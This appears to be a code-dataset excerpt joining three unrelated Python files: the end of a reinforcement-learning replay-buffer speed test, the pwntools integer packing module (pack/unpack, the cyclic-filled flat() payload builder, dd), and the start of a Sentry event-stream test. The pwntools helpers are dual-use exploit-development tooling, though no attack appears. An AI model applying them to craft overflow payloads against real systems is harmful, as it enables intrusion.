'''convert tuple into array'''
arrays = self.transition(*zip(*[self.memories[i] for i in indices]))
'''convert array into torch.tensor'''
tensors = [torch.tensor(np.array(ary), dtype=torch.float32, device=device)
for ary in arrays]
return tensors
class BufferArray: # 2020-05-20
def __init__(self, memo_max_len, state_dim, action_dim, ):
memo_dim = 1 + 1 + state_dim + action_dim + state_dim
self.memories = np.empty((memo_max_len, memo_dim), dtype=np.float32)
self.next_idx = 0
self.is_full = False
self.max_len = memo_max_len
self.now_len = self.max_len if self.is_full else self.next_idx
self.state_idx = 1 + 1 + state_dim # reward_dim==1, done_dim==1
self.action_idx = self.state_idx + action_dim
def add_memo(self, memo_tuple):
self.memories[self.next_idx] = np.hstack(memo_tuple)
self.next_idx = self.next_idx + 1
if self.next_idx >= self.max_len:
self.is_full = True
self.next_idx = 0
def init_after_add_memo(self):
self.now_len = self.max_len if self.is_full else self.next_idx
def random_sample(self, batch_size, device):
# device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# indices = rd.choice(self.memo_len, batch_size, replace=False) # why perform worse?
# indices = rd.choice(self.memo_len, batch_size, replace=True) # why perform better?
# same as:
indices = rd.randint(self.now_len, size=batch_size)
memory = self.memories[indices]
memory = torch.tensor(memory, device=device)
'''convert array into torch.tensor'''
tensors = (
memory[:, 0:1], # rewards
memory[:, 1:2], # masks, mark == (1-float(done)) * gamma
memory[:, 2:self.state_idx], # states
memory[:, self.state_idx:self.action_idx], # actions
memory[:, self.action_idx:], # next_states
)
return tensors
def uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim):
state = env.reset()
rewards = list()
reward_sum = 0.0
steps = list()
step = 0
global_step = 0
while global_step < max_step:
# action = np.tanh(rd.normal(0, 0.5, size=action_dim)) # zero-mean gauss exploration
action = rd.uniform(-1.0, +1.0, size=action_dim) # uniform exploration
next_state, reward, done, _ = env.step(action * max_action)
reward_sum += reward
step += 1
adjust_reward = reward * reward_scale
mask = 0.0 if done else gamma
memo.add_memo((adjust_reward, mask, state, action, next_state))
state = next_state
if done:
rewards.append(reward_sum)
steps.append(step)
global_step += step
state = env.reset() # reset the environment
reward_sum = 0.0
step = 1
memo.init_after_add_memo()
return rewards, steps
def run_compare_speed_of_replay_buffer():
from AgentRun import get_env_info
os.environ['CUDA_VISIBLE_DEVICES'] = '3' # sys.argv[-1][-4]
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
batch_size = 2 ** 8
max_step = 2 ** 10
gamma = 0.99
reward_scale = 1
memo_max_len = 2 ** 13
start_time = timer()
for env_name in ("LunarLanderContinuous-v2", "BipedalWalker-v3"):
env = gym.make(env_name)
state_dim, action_dim, max_action, target_reward = get_env_info(env)
# memo = MemoryList(memo_max_len)
# memo = MemoryTuple(memo_max_len)
memo = BufferArray(memo_max_len, state_dim, action_dim)
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for i in range(8):
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for _ in range(max_step):
batches = memo.random_sample(batch_size, device)
for batch in batches:
assert torch.is_tensor(batch)
print("Used Time: {:.1f}".format(timer() - start_time))
if __name__ == '__main__':
run_compare_speed_of_replay_buffer()
|
py | 1a4fc9e19a1373fd6874141a837ea904cf6af46d | # -*- coding: utf-8 -*-
r"""
Module for packing and unpacking integers.
Simplifies access to the standard ``struct.pack`` and ``struct.unpack``
functions, and also adds support for packing/unpacking arbitrary-width
integers.
The packers are all context-aware for ``endian`` and ``signed`` arguments,
though they can be overridden in the parameters.
Examples:
>>> p8(0)
b'\x00'
>>> p32(0xdeadbeef)
b'\xef\xbe\xad\xde'
>>> p32(0xdeadbeef, endian='big')
b'\xde\xad\xbe\xef'
>>> with context.local(endian='big'): p32(0xdeadbeef)
b'\xde\xad\xbe\xef'
Make a frozen packer, which does not change with context.
>>> p=make_packer('all')
>>> p(0xff)
b'\xff'
>>> p(0x1ff)
b'\xff\x01'
>>> with context.local(endian='big'): print(repr(p(0x1ff)))
b'\xff\x01'
"""
from __future__ import absolute_import
from __future__ import division
import collections
import six
import struct
import sys
from six.moves import range
from pwnlib.context import LocalNoarchContext
from pwnlib.context import context
from pwnlib.log import getLogger
from pwnlib.util import iters
mod = sys.modules[__name__]
log = getLogger(__name__)
def pack(number, word_size = None, endianness = None, sign = None, **kwargs):
"""pack(number, word_size = None, endianness = None, sign = None, **kwargs) -> str
Packs arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
`word_size` can be any positive number or the string "all". Choosing the
string "all" will output a string long enough to contain all the significant
bits and thus be decodable by :func:`unpack`.
`word_size` can be any positive number. The output will contain word_size/8
rounded up number of bytes. If word_size is not a multiple of 8, it will be
padded with zeroes up to a byte boundary.
Arguments:
number (int): Number to convert
word_size (int): Word size of the converted integer or the string 'all' (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The packed number as a string.
Examples:
>>> pack(0x414243, 24, 'big', True)
b'ABC'
>>> pack(0x414243, 24, 'little', True)
b'CBA'
>>> pack(0x814243, 24, 'big', False)
b'\\x81BC'
>>> pack(0x814243, 24, 'big', True)
Traceback (most recent call last):
...
ValueError: pack(): number does not fit within word_size
>>> pack(0x814243, 25, 'big', True)
b'\\x00\\x81BC'
>>> pack(-1, 'all', 'little', True)
b'\\xff'
>>> pack(-256, 'all', 'big', True)
b'\\xff\\x00'
>>> pack(0x0102030405, 'all', 'little', True)
b'\\x05\\x04\\x03\\x02\\x01'
>>> pack(-1)
b'\\xff\\xff\\xff\\xff'
>>> pack(0x80000000, 'all', 'big', True)
b'\\x00\\x80\\x00\\x00\\x00'
"""
if sign is None and number < 0:
sign = True
if word_size != 'all':
kwargs.setdefault('word_size', word_size)
kwargs.setdefault('endianness', endianness)
kwargs.setdefault('sign', sign)
with context.local(**kwargs):
# Lookup in context if not found
word_size = 'all' if word_size == 'all' else context.word_size
endianness = context.endianness
sign = context.sign
if not isinstance(number, six.integer_types):
raise ValueError("pack(): number must be of type (int,long) (got %r)" % type(number))
if not isinstance(sign, bool):
raise ValueError("pack(): sign must be either True or False (got %r)" % sign)
if endianness not in ['little', 'big']:
raise ValueError("pack(): endianness must be either 'little' or 'big' (got %r)" % endianness)
# Verify that word_size make sense
if word_size == 'all':
if number == 0:
word_size = 8
elif number > 0:
if sign:
word_size = (number.bit_length() | 7) + 1
else:
word_size = ((number.bit_length() - 1) | 7) + 1
else:
if not sign:
raise ValueError("pack(): number does not fit within word_size")
word_size = ((number + 1).bit_length() | 7) + 1
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("pack(): word_size must be a positive integer or the string 'all'")
if sign:
limit = 1 << (word_size-1)
if not -limit <= number < limit:
raise ValueError("pack(): number does not fit within word_size")
else:
limit = 1 << word_size
if not 0 <= number < limit:
raise ValueError("pack(): number does not fit within word_size [%i, %r, %r]" % (0, number, limit))
# Normalize number and size now that we have verified them
# From now on we can treat positive and negative numbers the same
number = number & ((1 << word_size) - 1)
byte_size = (word_size + 7) // 8
out = []
for _ in range(byte_size):
out.append(_p8lu(number & 0xff))
number = number >> 8
if endianness == 'little':
return b''.join(out)
else:
return b''.join(reversed(out))
@LocalNoarchContext
def unpack(data, word_size = None):
"""unpack(data, word_size = None, endianness = None, sign = None, **kwargs) -> int
Packs arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
`word_size` can be any positive number or the string "all". Choosing the
string "all" is equivalent to ``len(data)*8``.
If `word_size` is not a multiple of 8, then the bits used for padding
are discarded.
Arguments:
number (int): String to convert
word_size (int): Word size of the converted integer or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked number.
Examples:
>>> hex(unpack(b'\\xaa\\x55', 16, endian='little', sign=False))
'0x55aa'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=False))
'0xaa55'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=True))
'-0x55ab'
>>> hex(unpack(b'\\xaa\\x55', 15, endian='big', sign=True))
'0x2a55'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='little', sign=True))
'0x302ff'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='big', sign=True))
'-0xfdfd'
"""
# Lookup in context if not found
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
# Verify that word_size make sense
if word_size == 'all':
word_size = len(data) * 8
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("unpack(): word_size must be a positive integer or the string 'all'")
byte_size = (word_size + 7) // 8
if byte_size != len(data):
raise ValueError("unpack(): data must have length %d, since word_size was %d" % (byte_size, word_size))
number = 0
if endianness == "little":
data = reversed(data)
data = bytearray(data)
for c in data:
number = (number << 8) + c
number = number & ((1 << word_size) - 1)
if not sign:
return int(number)
signbit = number & (1 << (word_size-1))
return int(number - 2*signbit)
@LocalNoarchContext
def unpack_many(data, word_size = None):
"""unpack(data, word_size = None, endianness = None, sign = None) -> int list
Splits `data` into groups of ``word_size//8`` bytes and calls :func:`unpack` on each group. Returns a list of the results.
`word_size` must be a multiple of `8` or the string "all". In the latter case a singleton list will always be returned.
Args
number (int): String to convert
word_size (int): Word size of the converted integers or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked numbers.
Examples:
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='little', sign=False)))
['0x55aa', '0x33cc']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=False)))
['0xaa55', '0xcc33']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=True)))
['-0x55ab', '-0x33cd']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='little', sign=True)))
['0x302ff']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='big', sign=True)))
['-0xfdfd']
"""
# Lookup in context if None
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size == 'all':
return [unpack(data, word_size)]
# Currently we only group on byte boundaries
if word_size % 8 != 0:
raise ValueError("unpack_many(): word_size must be a multiple of 8")
out = []
n = word_size // 8
for i in range(0, len(data), n):
out.append(unpack(data[i:i+n], word_size))
return list(map(int, out))
#
# Make individual packers, e.g. _p8lu
#
ops = {'p': struct.pack, 'u': lambda *a: struct.unpack(*(
x.encode('latin1') if not hasattr(x, 'decode') else x
for x in a))[0]}
sizes = {8:'b', 16:'h', 32:'i', 64:'q'}
ends = ['b','l']
signs = ['s','u']
def make_single(op,size,end,sign):
name = '_%s%s%s%s' % (op, size, end, sign)
fmt = sizes[size]
end = '>' if end == 'b' else '<'
if sign == 'u':
fmt = fmt.upper()
fmt = end+fmt
def routine(data):
return ops[op](fmt,data)
routine.__name__ = routine.__qualname__ = name
return name, routine
for op,size,end,sign in iters.product(ops, sizes, ends, signs):
name, routine = make_single(op,size,end,sign)
setattr(mod, name, routine)
return_types = {'p': 'str', 'u': 'int'}
op_verbs = {'p': 'pack', 'u': 'unpack'}
arg_doc = {'p': 'number (int): Number to convert',
'u': 'data (str): String to convert'}
rv_doc = {'p': 'The packed number as a string',
'u': 'The unpacked number'}
#
# Make normal user-oriented packers, e.g. p8
#
def make_multi(op, size):
name = "%s%s" % (op,size)
ls = getattr(mod, "_%sls" % (name))
lu = getattr(mod, "_%slu" % (name))
bs = getattr(mod, "_%sbs" % (name))
bu = getattr(mod, "_%sbu" % (name))
@LocalNoarchContext
def routine(number):
endian = context.endian
signed = context.signed
return {("little", True ): ls,
("little", False): lu,
("big", True ): bs,
("big", False): bu}[endian, signed](number)
routine.__name__ = name
routine.__doc__ = """%s%s(number, sign, endian, ...) -> %s
%ss an %s-bit integer
Arguments:
%s
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer ("unsigned"/"signed")
kwargs (dict): Arguments passed to context.local(), such as
``endian`` or ``signed``.
Returns:
%s
""" % (op, size, return_types[op], op_verbs[op].title(), size, arg_doc[op], rv_doc[op])
return name, routine
for op,size in iters.product(ops, sizes):
name, routine = make_multi(op,size)
setattr(mod, name, routine)
def make_packer(word_size = None, sign = None, **kwargs):
"""make_packer(word_size = None, endianness = None, sign = None) -> number → str
Creates a packer by "freezing" the given arguments.
Semantically calling ``make_packer(w, e, s)(data)`` is equivalent to calling
``pack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer or the string all (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signness to be baked into the returned packer. ("unsigned"/"signed")
kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a number and returns a string
of that number in a packed form.
Examples:
>>> p = make_packer(32, endian='little', sign='unsigned')
>>> p
<function _p32lu at 0x...>
>>> p(42)
b'*\\x00\\x00\\x00'
>>> p(-1)
Traceback (most recent call last):
...
error: integer out of range for 'I' format code
>>> make_packer(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
with context.local(sign=sign, **kwargs):
word_size = word_size or context.word_size
endianness = context.endianness
sign = sign if sign is None else context.sign
if word_size in [8, 16, 32, 64]:
packer = {
(8, 0, 0): _p8lu,
(8, 0, 1): _p8ls,
(8, 1, 0): _p8bu,
(8, 1, 1): _p8bs,
(16, 0, 0): _p16lu,
(16, 0, 1): _p16ls,
(16, 1, 0): _p16bu,
(16, 1, 1): _p16bs,
(32, 0, 0): _p32lu,
(32, 0, 1): _p32ls,
(32, 1, 0): _p32bu,
(32, 1, 1): _p32bs,
(64, 0, 0): _p64lu,
(64, 0, 1): _p64ls,
(64, 1, 0): _p64bu,
(64, 1, 1): _p64bs,
}.get((word_size, {'big': 1, 'little': 0}[endianness], sign), None)
if packer:
return packer
return lambda number: pack(number, word_size, endianness, sign)
@LocalNoarchContext
def make_unpacker(word_size = None, endianness = None, sign = None, **kwargs):
"""make_unpacker(word_size = None, endianness = None, sign = None, **kwargs) -> str → number
Creates a unpacker by "freezing" the given arguments.
Semantically calling ``make_unpacker(w, e, s)(data)`` is equivalent to calling
``unpack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signness to be baked into the returned packer. ("unsigned"/"signed")
kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a string and returns a number
of that string in an unpacked form.
Examples:
>>> u = make_unpacker(32, endian='little', sign='unsigned')
>>> u
<function _u32lu at 0x...>
>>> hex(u('/bin'))
'0x6e69622f'
>>> u('abcde')
Traceback (most recent call last):
...
error: unpack requires a string argument of length 4
>>> make_unpacker(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size in [8, 16, 32, 64]:
endianness = 1 if endianness == 'big' else 0
return {
(8, 0, 0): _u8lu,
(8, 0, 1): _u8ls,
(8, 1, 0): _u8bu,
(8, 1, 1): _u8bs,
(16, 0, 0): _u16lu,
(16, 0, 1): _u16ls,
(16, 1, 0): _u16bu,
(16, 1, 1): _u16bs,
(32, 0, 0): _u32lu,
(32, 0, 1): _u32ls,
(32, 1, 0): _u32bu,
(32, 1, 1): _u32bs,
(64, 0, 0): _u64lu,
(64, 0, 1): _u64ls,
(64, 1, 0): _u64bu,
(64, 1, 1): _u64bs,
}[word_size, endianness, sign]
else:
return lambda number: unpack(number, word_size, endianness, sign)
def _fit(pieces, preprocessor, packer, filler):
# Pulls bytes from `filler` and adds them to `pad` until it ends in `key`.
# Returns the index of `key` in `pad`.
pad = bytearray()
def fill(key):
key = bytearray(key)
offset = pad.find(key)
while offset == -1:
pad.append(next(filler))
offset = pad.find(key, -len(key))
return offset
# Key conversion:
# - convert str/unicode keys to offsets
# - convert large int (no null-bytes in a machine word) keys to offsets
pieces_ = dict()
large_key = 2**(context.word_size-8)
for k, v in pieces.items():
if isinstance(k, six.integer_types):
if k >= large_key:
k = fill(pack(k))
elif isinstance(k, six.text_type):
k = fill(k.encode('utf8'))
elif isinstance(k, (bytearray, bytes)):
k = fill(k)
else:
raise TypeError("flat(): offset must be of type int or str, but got '%s'" % type(k))
if k in pieces_:
raise ValueError("flag(): multiple values at offset %d" % k)
pieces_[k] = v
pieces = pieces_
# We must "roll back" `filler` so each recursive call to `_flat` gets it in
# the right position
filler = iters.chain(pad, filler)
# Build output
out = b''
# Negative indices need to be removed and then re-submitted
negative = {k:v for k,v in pieces.items() if isinstance(k, int) and k<0}
for k in negative:
del pieces[k]
# Positive output
for k, v in sorted(pieces.items()):
if k < len(out):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out) < k:
out += p8(next(filler))
# Recursively flatten data
out += _flat([v], preprocessor, packer, filler)
# Now do negative indices
out_negative = b''
if negative:
most_negative = min(negative.keys())
for k, v in sorted(negative.items()):
k += -most_negative
if k < len(out_negative):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out_negative) < k:
out_negative += p8(next(filler))
# Recursively flatten data
out_negative += _flat([v], preprocessor, packer, filler)
return filler, out_negative + out
def _flat(args, preprocessor, packer, filler):
out = []
for arg in args:
if not isinstance(arg, (list, tuple, dict)):
arg_ = preprocessor(arg)
if arg_ is not None:
arg = arg_
if hasattr(arg, '__flat__'):
val = arg.__flat__()
elif isinstance(arg, (list, tuple)):
val = _flat(arg, preprocessor, packer, filler)
elif isinstance(arg, dict):
filler, val = _fit(arg, preprocessor, packer, filler)
elif isinstance(arg, bytes):
val = arg
elif isinstance(arg, six.text_type):
val = arg.encode('utf8')
elif isinstance(arg, six.integer_types):
val = packer(arg)
elif isinstance(arg, bytearray):
val = bytes(arg)
else:
raise ValueError("flat(): Flat does not support values of type %s" % type(arg))
out.append(val)
# Advance `filler` for "non-recursive" values
if not isinstance(arg, (list, tuple, dict)):
for _ in range(len(val)):
next(filler)
return b''.join(out)
@LocalNoarchContext
def flat(*args, **kwargs):
r"""flat(\*args, preprocessor = None, length = None, filler = de_bruijn(),
word_size = None, endianness = None, sign = None) -> str
Flattens the arguments into a string.
This function takes an arbitrary number of arbitrarily nested lists, tuples
and dictionaries. It will then find every string and number inside those
and flatten them out. Strings are inserted directly while numbers are
packed using the :func:`pack` function. Unicode strings are UTF-8 encoded.
Dictionary keys give offsets at which to place the corresponding values
(which are recursively flattened). Offsets are relative to where the
flattened dictionary occurs in the output (i.e. `{0: 'foo'}` is equivalent
to `'foo'`). Offsets can be integers, unicode strings or regular strings.
Integer offsets >= ``2**(word_size-8)`` are converted to a string using
`:func:pack`. Unicode strings are UTF-8 encoded. After these conversions
offsets are either integers or strings. In the latter case, the offset will
be the lowest index at which the string occurs in `filler`. See examples
below.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be byte at index ``n % len(iterable)`` byte
in `filler` if it has finite length or the byte at index `n` otherwise.
If `length` is given, the output will be padded with bytes from `filler` to
be this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
The three kwargs `word_size`, `endianness` and `sign` will default to using
values in :mod:`pwnlib.context` if not specified as an argument.
Arguments:
args: Values to flatten
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
length: The length of the output.
filler: Iterable to use for padding.
word_size (int): Word size of the converted integer.
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer (False/True)
Examples:
(Test setup, please ignore)
>>> context.clear()
Basic usage of :meth:`flat` works similar to the pack() routines.
>>> flat(4)
b'\x04\x00\x00\x00'
:meth:`flat` works with strings, bytes, lists, and dictionaries.
>>> flat(b'X')
b'X'
>>> flat([1,2,3])
b'\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00'
>>> flat({4:'X'})
b'aaaaX'
:meth:`.flat` flattens all of the values provided, and allows nested lists
and dictionaries.
>>> flat([{4:'X'}] * 2)
b'aaaaXaaacX'
>>> flat([[[[[[[[[1]]]], 2]]]]])
b'\x01\x00\x00\x00\x02\x00\x00\x00'
You can also provide additional arguments like endianness, word-size, and
whether the values are treated as signed or not.
>>> flat(1, "test", [[["AB"]*2]*3], endianness = 'little', word_size = 16, sign = False)
b'\x01\x00testABABABABABAB'
A preprocessor function can be provided in order to modify the values in-flight.
This example converts increments each value by 1, then converts to a string.
>>> flat([1, [2, 3]], preprocessor = lambda x: str(x+1))
b'234'
Using dictionaries is a fast way to get specific values at specific offsets,
without having to do ``data += "foo"`` repeatedly.
>>> flat({12: 0x41414141,
... 24: 'Hello',
... })
b'aaaabaaacaaaAAAAeaaafaaaHello'
Dictionary usage permits directly using values derived from :func:`.cyclic`.
See :func:`.cyclic`, :function:`pwnlib.context.context.cyclic_alphabet`, and :data:`.context.cyclic_size`
for more options.
The cyclic pattern can be provided as either the text or hexadecimal offset.
>>> flat({ 0x61616162: 'X'})
b'aaaaX'
>>> flat({'baaa': 'X'})
b'aaaaX'
Fields do not have to be in linear order, and can be freely mixed.
This also works with cyclic offsets.
>>> flat({2: 'A', 0:'B'})
b'BaA'
>>> flat({0x61616161:'x', 0x61616162:'y'})
b'xaaay'
>>> flat({0x61616162:'y', 0x61616161:'x'})
b'xaaay'
Fields do not have to be in order, and can be freely mixed.
>>> flat({'caaa': 'XXXX', 16: '\x41', 20: 0xdeadbeef})
b'aaaabaaaXXXXdaaaAaaa\xef\xbe\xad\xde'
>>> flat({ 8: [0x41414141, 0x42424242], 20: 'CCCC'})
b'aaaabaaaAAAABBBBeaaaCCCC'
>>> fit({
... 0x61616161: 'a',
... 1: 'b',
... 0x61616161+2: 'c',
... 3: 'd',
... })
b'abadbaaac'
By default, gaps in the data are filled in with the :meth:`.cyclic` pattern.
You can customize this by providing an iterable or method for the ``filler``
argument.
>>> flat({12: 'XXXX'}, filler = b'_', length = 20)
b'____________XXXX____'
>>> flat({12: 'XXXX'}, filler = b'AB', length = 20)
b'ABABABABABABXXXXABAB'
Nested dictionaries also work as expected.
>>> flat({4: {0: 'X', 4: 'Y'}})
b'aaaaXaaaY'
>>> fit({4: {4: 'XXXX'}})
b'aaaabaaaXXXX'
Negative indices are also supported, though this only works for integer
keys.
>>> flat({-4: 'x', -1: 'A', 0: '0', 4:'y'})
b'xaaA0aaay'
"""
# HACK: To avoid circular imports we need to delay the import of `cyclic`
from pwnlib.util import cyclic
preprocessor = kwargs.pop('preprocessor', lambda x: None)
filler = kwargs.pop('filler', cyclic.de_bruijn())
length = kwargs.pop('length', None)
if isinstance(filler, str):
filler = bytearray(six.ensure_binary(filler))
if kwargs != {}:
raise TypeError("flat() does not support argument %r" % kwargs.popitem()[0])
filler = iters.cycle(filler)
out = _flat(args, preprocessor, make_packer(), filler)
if length:
if len(out) > length:
raise ValueError("flat(): Arguments does not fit within `length` (= %d) bytes" % length)
out += b''.join(p8(next(filler)) for _ in range(length - len(out)))
return out
def fit(*args, **kwargs):
"""Legacy alias for :func:`flat`"""
return flat(*args, **kwargs)
"""
Generates a string from a dictionary mapping offsets to data to place at
that offset.
For each key-value pair in `pieces`, the key is either an offset or a byte
sequence. In the latter case, the offset will be the lowest index at which
the sequence occurs in `filler`. See examples below.
Each piece of data is passed to :meth:`flat` along with the keyword
arguments `word_size`, `endianness` and `sign`.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be byte at index ``n % len(iterable)`` byte
in `filler` if it has finite length or the byte at index `n` otherwise.
If `length` is given, the output will padded with bytes from `filler` to be
this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
If entries in `pieces` overlap, a :py:exc:`ValueError` exception is
raised.
Arguments:
pieces: Offsets and values to output.
length: The length of the output.
filler: Iterable to use for padding.
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
word_size (int): Word size of the converted integer (in bits).
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer (False/True)
Examples:
"""
def signed(integer):
return unpack(pack(integer), signed=True)
def unsigned(integer):
return unpack(pack(integer))
def dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False):
"""dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False) -> dst
Inspired by the command line tool ``dd``, this function copies `count` byte
values from offset `seek` in `src` to offset `skip` in `dst`. If `count` is
0, all of ``src[seek:]`` is copied.
If `dst` is a mutable type it will be updated. Otherwise a new instance of
the same type will be created. In either case the result is returned.
`src` can be an iterable of characters or integers, a unicode string or a
file object. If it is an iterable of integers, each integer must be in the
range [0;255]. If it is a unicode string, its UTF-8 encoding will be used.
The seek offset of file objects will be preserved.
Arguments:
dst: Supported types are `:class:file`, `:class:list`, `:class:tuple`,
`:class:str`, `:class:bytearray` and `:class:unicode`.
src: An iterable of byte values (characters or integers), a unicode
string or a file object.
count (int): How many bytes to copy. If `count` is 0 or larger than
``len(src[seek:])``, all bytes until the end of `src` are
copied.
skip (int): Offset in `dst` to copy to.
seek (int): Offset in `src` to copy from.
truncate (bool): If `:const:True`, `dst` is truncated at the last copied
byte.
Returns:
A modified version of `dst`. If `dst` is a mutable type it will be
modified in-place.
Examples:
>>> dd(tuple('Hello!'), b'?', skip = 5)
('H', 'e', 'l', 'l', 'o', b'?')
>>> dd(list('Hello!'), (63,), skip = 5)
['H', 'e', 'l', 'l', 'o', b'?']
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4).read()
'AAA\\x00\\x00\\x00\\x00AAA'
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4, truncate = True).read()
'AAA\\x00\\x00\\x00\\x00'
"""
# Re-open file objects to make sure we have the mode right
if hasattr(src, 'name'):
src = open(src.name, 'rb')
if hasattr(dst, 'name'):
real_dst = dst
dst = open(dst.name, 'rb+')
# Special case: both `src` and `dst` are files, so we don't need to hold
# everything in memory
if hasattr(src, 'seek') and hasattr(dst, 'seek'):
src.seek(seek)
dst.seek(skip)
n = 0
if count:
while n < count:
s = src.read(min(count - n, 0x1000))
if not s:
break
n += len(s)
dst.write(s)
else:
while True:
s = src.read(0x1000)
if not s:
break
n += len(s)
dst.write(s)
if truncate:
dst.truncate(skip + n)
src.close()
dst.close()
return real_dst
# Otherwise get `src` in canonical form, i.e. a string of at most `count`
# bytes
if isinstance(src, six.text_type):
if count:
# The only way to know where the `seek`th byte is, is to decode, but
# we only need to decode up to the first `seek + count` code points
src = src[:seek + count].encode('utf8')
# The code points may result in more that `seek + count` bytes
src = src[seek : seek + count]
else:
src = src.encode('utf8')[seek:]
elif hasattr(src, 'seek'):
src.seek(seek)
src_ = b''
if count:
while len(src_) < count:
s = src.read(count - len(src_))
if not s:
break
src_ += s
else:
while True:
s = src.read()
if not s:
break
src_ += s
src.close()
src = src_
elif isinstance(src, bytes):
if count:
src = src[seek : seek + count]
else:
src = src[seek:]
elif hasattr(src, '__iter__'):
src = src[seek:]
src_ = b''
for i, b in enumerate(src, seek):
if count and i > count + seek:
break
if isinstance(b, bytes):
src_ += b
elif isinstance(b, six.integer_types):
if b > 255 or b < 0:
raise ValueError("dd(): Source value %d at index %d is not in range [0;255]" % (b, i))
src_ += _p8lu(b)
else:
raise TypeError("dd(): Unsupported `src` element type: %r" % type(b))
src = src_
else:
raise TypeError("dd(): Unsupported `src` type: %r" % type(src))
# If truncate, then where?
if truncate:
truncate = skip + len(src)
# UTF-8 encode unicode `dst`
if isinstance(dst, six.text_type):
dst = dst.encode('utf8')
utf8 = True
else:
utf8 = False
# Match on the type of `dst`
if hasattr(dst, 'seek'):
dst.seek(skip)
dst.write(src)
if truncate:
dst.truncate(truncate)
dst.close()
dst = real_dst
elif isinstance(dst, (list, bytearray)):
dst[skip : skip + len(src)] = list(map(p8, bytearray(src)))
if truncate:
while len(dst) > truncate:
dst.pop()
elif isinstance(dst, tuple):
tail = dst[skip + len(src):]
dst = dst[:skip] + tuple(map(p8, bytearray(src)))
if not truncate:
dst = dst + tail
elif isinstance(dst, bytes):
tail = dst[skip + len(src):]
dst = dst[:skip] + src
if not truncate:
dst = dst + tail
else:
raise TypeError("dd(): Unsupported `dst` type: %r" % type(dst))
if utf8:
dst = dst.decode('utf8')
return dst
del op, size, end, sign
del name, routine, mod
|
py | 1a4fca22569bbc2855c440161117196ff655a028 | from __future__ import absolute_import
from datetime import datetime, timedelta
import six
import time
import logging
from mock import patch, Mock
from sentry.event_manager import EventManager
from sentry.eventstream.kafka import KafkaEventStream
from sentry.testutils import SnubaTestCase
from sentry.utils import snuba, json
class SnubaEventStreamTest(SnubaTestCase):
def setUp(self):
super(SnubaEventStreamTest, self).setUp()
self.kafka_eventstream = KafkaEventStream()
self.kafka_eventstream.producer = Mock()
@patch('sentry.eventstream.insert')
def test(self, mock_eventstream_insert):
now = datetime.utcnow()
def _get_event_count():
return snuba.query(
start=now - timedelta(days=1),
end=now + timedelta(days=1),
groupby=['project_id'],
filter_keys={'project_id': [self.project.id]},
).get(self.project.id, 0)
assert _get_event_count() == 0
raw_event = {
'event_id': 'a' * 32,
'message': 'foo',
'timestamp': time.mktime(now.timetuple()),
'level': logging.ERROR,
'logger': 'default',
'tags': [],
}
